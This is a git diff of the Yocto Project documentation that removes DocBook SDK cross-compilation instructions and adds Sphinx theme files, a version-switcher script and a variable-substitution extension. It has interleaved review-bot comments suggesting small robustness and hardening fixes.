- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis><filename>configure.ac</filename>:</emphasis>
- <literallayout class='monospaced'>
- AC_INIT(hello,0.1)
- AM_INIT_AUTOMAKE([foreign])
- AC_PROG_CC
- AC_CONFIG_FILES(Makefile)
- AC_OUTPUT
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis><filename>Makefile.am</filename>:</emphasis>
- <literallayout class='monospaced'>
- bin_PROGRAMS = hello
- hello_SOURCES = hello.c
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Source the Cross-Toolchain
- Environment Setup File:</emphasis>
- As described earlier in the manual, installing the
- cross-toolchain creates a cross-toolchain
- environment setup script in the directory that the SDK
- was installed.
- Before you can use the tools to develop your project,
- you must source this setup script.
- The script begins with the string "environment-setup"
- and contains the machine architecture, which is
- followed by the string "poky-linux".
- For this example, the command sources a script from the
- default SDK installation directory that uses the
- 32-bit Intel x86 Architecture and the
- &DISTRO_NAME; Yocto Project release:
- <literallayout class='monospaced'>
- $ source /opt/poky/&DISTRO;/environment-setup-i586-poky-linux
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Create the <filename>configure</filename> Script:</emphasis>
- Use the <filename>autoreconf</filename> command to
- generate the <filename>configure</filename> script.
- <literallayout class='monospaced'>
- $ autoreconf
- </literallayout>
- The <filename>autoreconf</filename> tool takes care
- of running the other Autotools such as
- <filename>aclocal</filename>,
- <filename>autoconf</filename>, and
- <filename>automake</filename>.
- <note>
- If you get errors from
- <filename>configure.ac</filename>, which
- <filename>autoreconf</filename> runs, that indicate
- missing files, you can use the "-i" option, which
- ensures missing auxiliary files are copied to the build
- host.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Cross-Compile the Project:</emphasis>
- This command compiles the project using the
- cross-compiler.
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CONFIGURE_FLAGS'><filename>CONFIGURE_FLAGS</filename></ulink>
- environment variable provides the minimal arguments for
- GNU configure:
- <literallayout class='monospaced'>
- $ ./configure ${CONFIGURE_FLAGS}
- </literallayout>
- For an Autotools-based project, you can use the
- cross-toolchain by just passing the appropriate host
- option to <filename>configure.sh</filename>.
- The host option you use is derived from the name of the
- environment setup script found in the directory in which
- you installed the cross-toolchain.
- For example, the host option for an ARM-based target that
- uses the GNU EABI is
- <filename>armv5te-poky-linux-gnueabi</filename>.
- You will notice that the name of the script is
- <filename>environment-setup-armv5te-poky-linux-gnueabi</filename>.
- Thus, the following command works to update your project
- and rebuild it using the appropriate cross-toolchain tools:
- <literallayout class='monospaced'>
- $ ./configure --host=armv5te-poky-linux-gnueabi --with-libtool-sysroot=<replaceable>sysroot_dir</replaceable>
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Make and Install the Project:</emphasis>
- These two commands generate and install the project
- into the destination directory:
- <literallayout class='monospaced'>
- $ make
- $ make install DESTDIR=./tmp
- </literallayout>
- <note>
- To learn about environment variables established
- when you run the cross-toolchain environment setup
- script and how they are used or overridden when
- the Makefile, see the
- "<link linkend='makefile-based-projects'>Makefile-Based Projects</link>"
- section.
- </note>
- This next command is a simple way to verify the
- installation of your project.
- Running the command prints the architecture on which
- the binary file can run.
- This architecture should be the same architecture that
- the installed cross-toolchain supports.
- <literallayout class='monospaced'>
- $ file ./tmp/usr/local/bin/hello
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Execute Your Project:</emphasis>
- To execute the project, you would need to run it on your
- target hardware.
- If your target hardware happens to be your build host,
- you could run the project as follows:
- <literallayout class='monospaced'>
- $ ./tmp/usr/local/bin/hello
- </literallayout>
- As expected, the project displays the "Hello World!"
- message.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='makefile-based-projects'>
- <title>Makefile-Based Projects</title>
-
- <para>
- Simple Makefile-based projects use and interact with the
- cross-toolchain environment variables established when you run
- the cross-toolchain environment setup script.
- The environment variables are subject to general
- <filename>make</filename> rules.
- </para>
-
- <para>
- This section presents a simple Makefile development flow and
- provides an example that lets you see how you can use
- cross-toolchain environment variables and Makefile variables
- during development.
- <imagedata fileref="figures/sdk-makefile-flow.png" width="6in" height="7in" align="center" />
- </para>
-
- <para>
- The main point of this section is to explain the following three
- cases regarding variable behavior:
- <itemizedlist>
- <listitem><para>
- <emphasis>Case 1 - No Variables Set in the
- <filename>Makefile</filename> Map to Equivalent
- Environment Variables Set in the SDK Setup Script:</emphasis>
- Because matching variables are not specifically set in the
- <filename>Makefile</filename>, the variables retain their
- values based on the environment setup script.
- </para></listitem>
- <listitem><para>
- <emphasis>Case 2 - Variables Are Set in the Makefile that
- Map to Equivalent Environment Variables from the SDK
- Setup Script:</emphasis>
- Specifically setting matching variables in the
- <filename>Makefile</filename> during the build results in
- the environment settings of the variables being
- overwritten.
- In this case, the variables you set in the
- <filename>Makefile</filename> are used.
- </para></listitem>
- <listitem><para>
- <emphasis>Case 3 - Variables Are Set Using the Command Line
- that Map to Equivalent Environment Variables from the
- SDK Setup Script:</emphasis>
- Executing the <filename>Makefile</filename> from the
- command line results in the environment variables being
- overwritten.
- In this case, the command-line content is used.
- </para></listitem>
- </itemizedlist>
- <note>
- Regardless of how you set your variables, if you use
- the "-e" option with <filename>make</filename>, the
- variables from the SDK setup script take precedence:
- <literallayout class='monospaced'>
- $ make -e <replaceable>target</replaceable>
- </literallayout>
- </note>
- </para>
-
- <para>
- The remainder of this section presents a simple Makefile example
- that demonstrates these variable behaviors.
- </para>
-
- <para>
- In a new shell environment variables are not established for the
- SDK until you run the setup script.
- For example, the following commands show a null value for the
- compiler variable (i.e.
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CC'><filename>CC</filename></ulink>).
- <literallayout class='monospaced'>
- $ echo ${CC}
-
- $
- </literallayout>
- Running the SDK setup script for a 64-bit build host and an
- i586-tuned target architecture for a
- <filename>core-image-sato</filename> image using the current
- &DISTRO; Yocto Project release and then echoing that variable
- shows the value established through the script:
- <literallayout class='monospaced'>
- $ source /opt/poky/&DISTRO;/environment-setup-i586-poky-linux
- $ echo ${CC}
- i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux
- </literallayout>
- </para>
-
- <para>
- To illustrate variable use, work through this simple "Hello World!"
- example:
- <orderedlist>
- <listitem><para>
- <emphasis>Create a Working Directory and Populate It:</emphasis>
- Create a clean directory for your project and then make
- that directory your working location.
- <literallayout class='monospaced'>
- $ mkdir $HOME/helloworld
- $ cd $HOME/helloworld
- </literallayout>
- After setting up the directory, populate it with files
- needed for the flow.
- You need a <filename>main.c</filename> file from which you
- call your function, a <filename>module.h</filename> file
- to contain headers, and a <filename>module.c</filename>
- that defines your function.
- </para>
-
- <para>Create the three files as follows:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>main.c</filename>:</emphasis>
- <literallayout class='monospaced'>
- #include "module.h"
- void sample_func();
- int main()
- {
- sample_func();
- return 0;
- }
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis><filename>module.h</filename>:</emphasis>
- <literallayout class='monospaced'>
- #include &lt;stdio.h&gt;
- void sample_func();
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis><filename>module.c</filename>:</emphasis>
- <literallayout class='monospaced'>
- #include "module.h"
- void sample_func()
- {
- printf("Hello World!");
- printf("\n");
- }
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Source the Cross-Toolchain Environment Setup File:</emphasis>
- As described earlier in the manual, installing the
- cross-toolchain creates a cross-toolchain environment setup
- script in the directory that the SDK was installed.
- Before you can use the tools to develop your project,
- you must source this setup script.
- The script begins with the string "environment-setup"
- and contains the machine architecture, which is
- followed by the string "poky-linux".
- For this example, the command sources a script from the
- default SDK installation directory that uses the
- 32-bit Intel x86 Architecture and the
- &DISTRO_NAME; Yocto Project release:
- <literallayout class='monospaced'>
- $ source /opt/poky/&DISTRO;/environment-setup-i586-poky-linux
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Create the <filename>Makefile</filename>:</emphasis>
- For this example, the Makefile contains two lines that
- can be used to set the <filename>CC</filename> variable.
- One line is identical to the value that is set when you
- run the SDK environment setup script, and the other line
- sets <filename>CC</filename> to "gcc", the default GNU
- compiler on the build host:
- <literallayout class='monospaced'>
- # CC=i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux
- # CC="gcc"
- all: main.o module.o
- ${CC} main.o module.o -o target_bin
- main.o: main.c module.h
- ${CC} -I . -c main.c
- module.o: module.c module.h
- ${CC} -I . -c module.c
- clean:
- rm -rf *.o
- rm target_bin
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Make the Project:</emphasis>
- Use the <filename>make</filename> command to create the
- binary output file.
- Because variables are commented out in the Makefile,
- the value used for <filename>CC</filename> is the value
- set when the SDK environment setup file was run:
- <literallayout class='monospaced'>
- $ make
- i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c main.c
- i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c module.c
- i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux main.o module.o -o target_bin
- </literallayout>
- From the results of the previous command, you can see that
- the compiler used was the compiler established through
- the <filename>CC</filename> variable defined in the
- setup script.</para>
-
- <para>You can override the <filename>CC</filename>
- environment variable with the same variable as set from
- the Makefile by uncommenting the line in the Makefile
- and running <filename>make</filename> again.
- <literallayout class='monospaced'>
- $ make clean
- rm -rf *.o
- rm target_bin
- #
- # Edit the Makefile by uncommenting the line that sets CC to "gcc"
- #
- $ make
- gcc -I . -c main.c
- gcc -I . -c module.c
- gcc main.o module.o -o target_bin
- </literallayout>
- As shown in the previous example, the cross-toolchain
- compiler is not used.
- Rather, the default compiler is used.</para>
-
- <para>This next case shows how to override a variable
- by providing the variable as part of the command line.
- Go into the Makefile and re-insert the comment character
- so that running <filename>make</filename> uses
- the established SDK compiler.
- However, when you run <filename>make</filename>, use a
- command-line argument to set <filename>CC</filename>
- to "gcc":
- <literallayout class='monospaced'>
- $ make clean
- rm -rf *.o
- rm target_bin
- #
- # Edit the Makefile to comment out the line setting CC to "gcc"
- #
- $ make
- i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c main.c
- i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c module.c
- i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux main.o module.o -o target_bin
- $ make clean
- rm -rf *.o
- rm target_bin
- $ make CC="gcc"
- gcc -I . -c main.c
- gcc -I . -c module.c
- gcc main.o module.o -o target_bin
- </literallayout>
- In the previous case, the command-line argument overrides
- the SDK environment variable.</para>
-
- <para>In this last case, edit Makefile again to use the
- "gcc" compiler but then use the "-e" option on the
- <filename>make</filename> command line:
- <literallayout class='monospaced'>
- $ make clean
- rm -rf *.o
- rm target_bin
- #
- # Edit the Makefile to use "gcc"
- #
- $ make
- gcc -I . -c main.c
- gcc -I . -c module.c
- gcc main.o module.o -o target_bin
- $ make clean
- rm -rf *.o
- rm target_bin
- $ make -e
- i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c main.c
- i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c module.c
- i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux main.o module.o -o target_bin
- </literallayout>
- In the previous case, the "-e" option forces
- <filename>make</filename> to use the SDK environment
- variables regardless of the values in the Makefile.
- </para></listitem>
- <listitem><para>
- <emphasis>Execute Your Project:</emphasis>
- To execute the project (i.e.
- <filename>target_bin</filename>), use the following
- command:
- <literallayout class='monospaced'>
- $ ./target_bin
- Hello World!
- </literallayout>
- <note>
- If you used the cross-toolchain compiler to build
- <filename>target_bin</filename> and your build host
- differs in architecture from that of the target
- machine, you need to run your project on the target
- device.
- </note>
- As expected, the project displays the "Hello World!"
- message.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/sphinx-static/YoctoProject_Logo_RGB.jpg b/documentation/sphinx-static/YoctoProject_Logo_RGB.jpg
new file mode 100644
index 0000000000..8ab47d49f7
--- /dev/null
+++ b/documentation/sphinx-static/YoctoProject_Logo_RGB.jpg
Binary files differ
diff --git a/documentation/sphinx-static/switchers.js b/documentation/sphinx-static/switchers.js
new file mode 100644
index 0000000000..1d65fa7fae
--- /dev/null
+++ b/documentation/sphinx-static/switchers.js
@@ -0,0 +1,236 @@
+(function() {
+ 'use strict';
+
+ var all_versions = {
+ 'dev': 'dev (3.5)',
+ '3.4.1': '3.4.1',
+ '3.3.4': '3.3.4',
+ '3.2.4': '3.2.4',
+ '3.1.14': '3.1.14',
+ '3.0.4': '3.0.4',
+ '2.7.4': '2.7.4',
+ };
+
+ var all_doctypes = {
+ 'single': 'Individual Webpages',
+ 'mega': "All-in-one 'Mega' Manual",
+ };
+
+ // Simple version comparision
+ // Return 1 if a > b
+ // Return -1 if a < b
+ // Return 0 if a == b
+ function ver_compare(a, b) {
+ if (a == "dev") {
+ return 1;
+ }
+
+ if (a === b) {
+ return 0;
+ }
+
+ var a_components = a.split(".");
+ var b_components = b.split(".");
+
+ var len = Math.min(a_components.length, b_components.length);
+
+ // loop while the components are equal
+ for (var i = 0; i < len; i++) {
+ // A bigger than B
+ if (parseInt(a_components[i]) > parseInt(b_components[i])) {
+ return 1;
+ }
+
+ // B bigger than A
+ if (parseInt(a_components[i]) < parseInt(b_components[i])) {
+ return -1;
+ }
+ }
+
+ // If one's a prefix of the other, the longer one is greater.
+ if (a_components.length > b_components.length) {
+ return 1;
+ }
+
+ if (a_components.length < b_components.length) {
+ return -1;
+ }
+
+ // Otherwise they are the same.
+ return 0;
+ }
+
+ function build_version_select(current_series, current_version) {
+ var buf = ['<select>'];
+
+ $.each(all_versions, function(version, title) {
+ var series = version.substr(0, 3);
+ if (series == current_series) {
+ if (version == current_version)
+ buf.push('<option value="' + version + '" selected="selected">' + title + '</option>');
+ else
+ buf.push('<option value="' + version + '">' + title + '</option>');
+
+ if (version != current_version)
+ buf.push('<option value="' + current_version + '" selected="selected">' + current_version + '</option>');
+ } else {
+ buf.push('<option value="' + version + '">' + title + '</option>');
+ }
+ });
+
+ buf.push('</select>');
+ return buf.join('');
+ }
+
+ function build_doctype_select(current_doctype) {
+ var buf = ['<select>'];
+
+ $.each(all_doctypes, function(doctype, title) {
+ if (doctype == current_doctype)
+ buf.push('<option value="' + doctype + '" selected="selected">' +
+ all_doctypes[current_doctype] + '</option>');
+ else
+ buf.push('<option value="' + doctype + '">' + title + '</option>');
+ });
+ if (!(current_doctype in all_doctypes)) {
+ // In case we're browsing a doctype that is not yet in all_doctypes.
+ buf.push('<option value="' + current_doctype + '" selected="selected">' +
+ current_doctype + '</option>');
+ all_doctypes[current_doctype] = current_doctype;
+ }
+ buf.push('</select>');
+ return buf.join('');
+ }
+
+ function navigate_to_first_existing(urls) {
+ // Navigate to the first existing URL in urls.
+ var url = urls.shift();
+
+ // Web browsers won't redirect file:// urls to file urls using ajax but
+ // its useful for local testing
+ if (url.startsWith("file://")) {
+ window.location.href = url;
+ return;
+ }
+
+ if (urls.length == 0) {
+ window.location.href = url;
+ return;
+ }
+ $.ajax({
+ url: url,
+ success: function() {
+ window.location.href = url;
+ },
+ error: function() {
+ navigate_to_first_existing(urls);
+ }
+ });
+ }
+
+ function get_docroot_url() {
+ var url = window.location.href;
+ var root = DOCUMENTATION_OPTIONS.URL_ROOT;
+
+ var urlarray = url.split('/');
+ // Trim off anything after '/'
+ urlarray.pop();
+ var depth = (root.match(/\.\.\//g) || []).length;
+ for (var i = 0; i < depth; i++) {
+ urlarray.pop();
+ }
+
+ return urlarray.join('/') + '/';
+ }
+
+ function on_version_switch() {
+ var selected_version = $(this).children('option:selected').attr('value');
+ var url = window.location.href;
+ var current_version = DOCUMENTATION_OPTIONS.VERSION;
+ var docroot = get_docroot_url()
+
+ var new_versionpath = selected_version + '/';
+ if (selected_version == "dev")
+ new_versionpath = '';
+
+ // dev versions have no version prefix
+ if (current_version == "dev") {
+ var new_url = docroot + new_versionpath + url.replace(docroot, "");
+ var fallback_url = docroot + new_versionpath;
+ } else {
+ var new_url = url.replace('/' + current_version + '/', '/' + new_versionpath);
+ var fallback_url = new_url.replace(url.replace(docroot, ""), "");
+ }
+
+ console.log(get_docroot_url())
+ console.log(url + " to url " + new_url);
+ console.log(url + " to fallback " + fallback_url);
+
+ if (new_url != url) {
+ navigate_to_first_existing([
+ new_url,
+ fallback_url,
+ 'https://www.yoctoproject.org/docs/',
+ ]);
+ }
+ }
+
+ function on_doctype_switch() {
+ var selected_doctype = $(this).children('option:selected').attr('value');
+ var url = window.location.href;
+ if (selected_doctype == 'mega') {
+ var docroot = get_docroot_url()
+ var current_version = DOCUMENTATION_OPTIONS.VERSION;
+ // Assume manuals before 3.2 are using old docbook mega-manual
+ if (ver_compare(current_version, "3.2") < 0) {
+ var new_url = docroot + "mega-manual/mega-manual.html";
+ } else {
+ var new_url = docroot + "singleindex.html";
+ }
+ } else {
+ var new_url = url.replace("singleindex.html", "index.html")
+ }
+
+ if (new_url != url) {
+ navigate_to_first_existing([
+ new_url,
+ 'https://www.yoctoproject.org/docs/',
+ ]);
+ }
+ }
+
+ // Returns the current doctype based upon the url
+ function doctype_segment_from_url(url) {
+ if (url.includes("singleindex") || url.includes("mega-manual"))
+ return "mega";
+ return "single";
+ }
+
+ $(document).ready(function() {
+ var release = DOCUMENTATION_OPTIONS.VERSION;
+ var current_doctype = doctype_segment_from_url(window.location.href);
+ var current_series = release.substr(0, 3);
+ var version_select = build_version_select(current_series, release);
+
+ $('.version_switcher_placeholder').html(version_select);
+ $('.version_switcher_placeholder select').bind('change', on_version_switch);
+
+ var doctype_select = build_doctype_select(current_doctype);
+
+ $('.doctype_switcher_placeholder').html(doctype_select);
+ $('.doctype_switcher_placeholder select').bind('change', on_doctype_switch);
+
+ if (ver_compare(release, "3.1") < 0) {
+ $('#outdated-warning').html('Version ' + release + ' of the project is now considered obsolete, please select and use a more recent version');
+ $('#outdated-warning').css('padding', '.5em');
+ } else if (release != "dev") {
+ $.each(all_versions, function(version, title) {
+ var series = version.substr(0, 3);
+ if (series == current_series && version != release) {
+ $('#outdated-warning').html('This document is for outdated version ' + release + ', you should select the latest release version in this series, ' + version + '.');
+ $('#outdated-warning').css('padding', '.5em');
+ }
+ });
+ }
+ });
+})();
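Review bot: `build_version_select`, `build_doctype_select` and the `$(document).ready` handler assemble markup by string concatenation and write it with `.html()`, so `DOCUMENTATION_OPTIONS.VERSION` and the `all_versions` titles are parsed as HTML rather than inserted as text. These values appear to come from the Sphinx build configuration rather than from the request, so this is a hardening point, not a demonstrated injection. The warning can be written with `$('#outdated-warning').text(msg)` with no change in output, and the options can be built with `$('<option>').val(version).text(title)` so that a stray `<`, `"` or `&` in a version label cannot alter the DOM. Separately, the three `console.log` calls in `on_version_switch` look like leftover debugging and could be dropped.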
diff --git a/documentation/sphinx-static/theme_overrides.css b/documentation/sphinx-static/theme_overrides.css
new file mode 100644
index 0000000000..d235cb826f
--- /dev/null
+++ b/documentation/sphinx-static/theme_overrides.css
@@ -0,0 +1,164 @@
+/*
+ SPDX-License-Identifier: CC-BY-SA-2.0-UK
+*/
+
+body {
+ font-family: Verdana, Sans, sans-serif;
+ margin: 0em auto;
+ color: #333;
+}
+
+h1,h2,h3,h4,h5,h6,h7 {
+ font-family: Arial, Sans;
+ color: #00557D;
+ clear: both;
+}
+
+h1 {
+ font-size: 2em;
+ text-align: left;
+ padding: 0em 0em 0em 0em;
+ margin: 2em 0em 0em 0em;
+}
+
+h2.subtitle {
+ margin: 0.10em 0em 3.0em 0em;
+ padding: 0em 0em 0em 0em;
+ font-size: 1.8em;
+ padding-left: 20%;
+ font-weight: normal;
+ font-style: italic;
+}
+
+h2 {
+ margin: 2em 0em 0.66em 0em;
+ padding: 0.5em 0em 0em 0em;
+ font-size: 1.5em;
+ font-weight: bold;
+}
+
+h3.subtitle {
+ margin: 0em 0em 1em 0em;
+ padding: 0em 0em 0em 0em;
+ font-size: 142.14%;
+ text-align: right;
+}
+
+h3 {
+ margin: 1em 0em 0.5em 0em;
+ padding: 1em 0em 0em 0em;
+ font-size: 140%;
+ font-weight: bold;
+}
+
+h4 {
+ margin: 1em 0em 0.5em 0em;
+ padding: 1em 0em 0em 0em;
+ font-size: 120%;
+ font-weight: bold;
+}
+
+h5 {
+ margin: 1em 0em 0.5em 0em;
+ padding: 1em 0em 0em 0em;
+ font-size: 110%;
+ font-weight: bold;
+}
+
+h6 {
+ margin: 1em 0em 0em 0em;
+ padding: 1em 0em 0em 0em;
+ font-size: 110%;
+ font-weight: bold;
+}
+
+em {
+ font-weight: bold;
+}
+
+.pre {
+ font-size: medium;
+ font-family: Courier, monospace;
+}
+
+.wy-nav-content a {
+ text-decoration: underline;
+ color: #444;
+ background: transparent;
+}
+
+.wy-nav-content a:hover {
+ text-decoration: underline;
+ background-color: #dedede;
+}
+
+.wy-nav-content a:visited {
+ color: #444;
+}
+
+[alt='Permalink'] { color: #eee; }
+[alt='Permalink']:hover { color: black; }
+
+@media screen {
+ /* content column
+ *
+ * RTD theme's default is 800px as max width for the content, but we have
+ * tables with tons of columns, which need the full width of the view-port.
+ */
+
+ .wy-nav-content{max-width: none; }
+
+ /* inline literal: drop the borderbox, padding and red color */
+ code, .rst-content tt, .rst-content code {
+ color: inherit;
+ border: none;
+ padding: unset;
+ background: inherit;
+ font-size: 85%;
+ }
+
+ .rst-content tt.literal,.rst-content tt.literal,.rst-content code.literal {
+ color: inherit;
+ }
+
+ /* Admonition should be gray, not blue or green */
+ .rst-content .note .admonition-title,
+ .rst-content .tip .admonition-title,
+ .rst-content .warning .admonition-title,
+ .rst-content .caution .admonition-title,
+ .rst-content .admonition-tying-it-together .admonition-title,
+ .rst-content .important .admonition-title {
+ background: #f0f0f2;
+ color: #00557D;
+
+ }
+
+ .rst-content .note,
+ .rst-content .tip,
+ .rst-content .important,
+ .rst-content .warning,
+ .rst-content .admonition-tying-it-together,
+ .rst-content .caution {
+ background: #f0f0f2;
+ }
+
+ /* Remove the icon in front of note/tip element, and before the logo */
+ .icon-home:before, .rst-content .admonition-title:before {
+ display: none
+ }
+
+ /* a custom informalexample container is used in some doc */
+ .informalexample {
+ border: 1px solid;
+ border-color: #aaa;
+ margin: 1em 0em;
+ padding: 1em;
+ page-break-inside: avoid;
+ }
+
+ /* Remove the blue background in the top left corner, around the logo */
+ .wy-side-nav-search {
+ background: inherit;
+ }
+
+}
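Review bot: The selector list `.rst-content tt.literal,.rst-content tt.literal,.rst-content code.literal` names `tt.literal` twice; one of the two was probably meant to be a different selector, or can be dropped. The heading rule `h1,h2,h3,h4,h5,h6,h7` also lists `h7`, which is not an HTML element, and its `font-family: Arial, Sans` has no generic fallback such as `sans-serif`.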
diff --git a/documentation/sphinx/yocto-vars.py b/documentation/sphinx/yocto-vars.py
new file mode 100644
index 0000000000..8795eee0a0
--- /dev/null
+++ b/documentation/sphinx/yocto-vars.py
@@ -0,0 +1,86 @@
+#!/usr/bin/env python
+from hashlib import md5
+from pathlib import Path
+import re
+import sys
+
+import sphinx
+from sphinx.application import Sphinx
+
+# This extension uses pyyaml, report an explicit
+# error message if it's not installed
+try:
+ import yaml
+except ImportError:
+ sys.stderr.write("The Yocto Project Sphinx documentation requires PyYAML.\
+ \nPlease make sure to install pyyaml python package.\n")
+ sys.exit(1)
+
+__version__ = '1.0'
+
+# Variables substitutions. Uses {VAR} subst using variables defined in poky.yaml
+# Each .rst file is processed after source-read event (subst_vars_replace runs once per file)
+subst_vars = {}
+
+poky_hash = ""
+
+def subst_vars_replace(app: Sphinx, docname, source):
+ result = source[0]
+ for k in subst_vars:
+ result = result.replace("&"+k+";", subst_vars[k])
+ source[0] = result
+
+def yocto_vars_env_get_outdated(app: Sphinx, env, added, changed, removed):
+ '''
+ If poky.yaml changed (BUILDDIR/.poky.yaml.cache does not exist or contains
+ an md5sum different from poky.yaml's current md5sum), force rebuild of all
+ *.rst files in SOURCEDIR whose content has at least one occurence of `&.*;`
+ (see PATTERN global variable).
+ '''
+ try:
+ poky_cache = Path(app.outdir) / ".poky.yaml.cache"
+ cache_hash = poky_cache.read_text()
+ except FileNotFoundError:
+ cache_hash = None
+
+ if poky_hash == cache_hash:
+ return []
+
+ docs = []
+ for p in Path(app.srcdir).rglob("*.rst"):
+ if PATTERN.search(p.read_text()):
+ p_rel_no_ext = p.relative_to(app.srcdir).parent / p.stem
+ docs.append(str(p_rel_no_ext))
+ return docs
+
+def yocto_vars_build_finished(app: Sphinx, exception):
+ poky_cache = Path(app.outdir) / ".poky.yaml.cache"
+ poky_cache.write_text(poky_hash)
+ return []
+
+PATTERN = re.compile(r'&(.*?);')
+def expand(val, src):
+ return PATTERN.sub(lambda m: expand(src.get(m.group(1), ''), src), val)
+
+def setup(app: Sphinx):
+ global poky_hash
+
+ with open("poky.yaml") as file:
+ hasher = md5()
+ buff = file.read()
+ hasher.update(buff.encode('utf-8'))
+ poky_hash = hasher.hexdigest()
+ subst_vars.update(yaml.safe_load(buff))
+
+ for k in subst_vars:
+ subst_vars[k] = expand(subst_vars[k], subst_vars)
+
+ app.connect('source-read', subst_vars_replace)
+ app.connect('env-get-outdated', yocto_vars_env_get_outdated)
+ app.connect('build-finished', yocto_vars_build_finished)
+
+ return dict(
+ version = __version__,
+ parallel_read_safe = True,
+ parallel_write_safe = True
+ )
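Review bot: `expand` recurses on every `&name;` reference with no cycle check, so a variable in `poky.yaml` that refers to itself, directly or through another variable, ends the build with a bare `RecursionError` instead of a message naming the variable. Tracking the names already being expanded and raising a `ValueError` on a repeat, as sketched below, makes that failure readable. `yaml.safe_load` can also return non-string scalars (an unquoted `3.4` loads as a float), which would raise `TypeError` in `PATTERN.sub` and in `result.replace(...)` inside `subst_vars_replace`; whether `poky.yaml` holds such values is not visible here, so it is worth either coercing with `str()` or documenting that all values must be quoted. `setup` also opens `"poky.yaml"` relative to the current working directory and without an explicit encoding, where `Path(app.srcdir) / "poky.yaml"` with `encoding="utf-8"` would not depend on where `sphinx-build` is invoked.

```python
def expand(val, src, _seen=()):
    def _sub(m):
        name = m.group(1)
        if name in _seen:
            raise ValueError("poky.yaml: circular reference to &%s;" % name)
        return expand(src.get(name, ''), src, _seen + (name,))
    return PATTERN.sub(_sub, val)
```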
diff --git a/documentation/template/Vera.xml b/documentation/template/Vera.xml
deleted file mode 100644
index 3c82043e35..0000000000
--- a/documentation/template/Vera.xml
+++ /dev/null
@@ -1 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?><font-metrics type="TYPE0"><font-name>BitstreamVeraSans</font-name><embed/><cap-height>729</cap-height><x-height>546</x-height><ascender>928</ascender><descender>-235</descender><bbox><left>-183</left><bottom>-235</bottom><right>1287</right><top>928</top></bbox><flags>32</flags><stemv>0</stemv><italicangle>0</italicangle><subtype>TYPE0</subtype><multibyte-extras><cid-type>CIDFontType2</cid-type><default-width>0</default-width><bfranges><bf gi="3" ue="126" us="32"/><bf gi="172" ue="160" us="160"/><bf gi="163" ue="161" us="161"/><bf gi="132" ue="163" us="162"/><bf gi="189" ue="164" us="164"/><bf gi="150" ue="165" us="165"/><bf gi="231" ue="166" us="166"/><bf gi="134" ue="167" us="167"/><bf gi="142" ue="168" us="168"/><bf gi="139" ue="169" us="169"/><bf gi="157" ue="170" us="170"/><bf gi="169" ue="171" us="171"/><bf gi="164" ue="172" us="172"/><bf gi="256" ue="173" us="173"/><bf gi="138" ue="174" us="174"/><bf gi="217" ue="175" us="175"/><bf gi="131" ue="176" us="176"/><bf gi="147" ue="177" us="177"/><bf gi="241" ue="179" us="178"/><bf gi="141" ue="180" us="180"/><bf gi="151" ue="181" us="181"/><bf gi="136" ue="182" us="182"/><bf gi="195" ue="183" us="183"/><bf gi="221" ue="184" us="184"/><bf gi="240" ue="185" us="185"/><bf gi="158" ue="186" us="186"/><bf gi="170" ue="187" us="187"/><bf gi="243" ue="190" us="188"/><bf gi="162" ue="191" us="191"/><bf gi="173" ue="192" us="192"/><bf gi="201" ue="193" us="193"/><bf gi="199" ue="194" us="194"/><bf gi="174" ue="195" us="195"/><bf gi="98" ue="197" us="196"/><bf gi="144" ue="198" us="198"/><bf gi="100" ue="199" us="199"/><bf gi="203" ue="200" us="200"/><bf gi="101" ue="201" us="201"/><bf gi="200" ue="202" us="202"/><bf gi="202" ue="203" us="203"/><bf gi="207" ue="204" us="204"/><bf gi="204" ue="207" us="205"/><bf gi="232" ue="208" us="208"/><bf gi="102" ue="209" us="209"/><bf gi="210" ue="210" us="210"/><bf gi="208" ue="212" us="211"/><bf gi="175" ue="213" us="213"/><bf gi="103" 
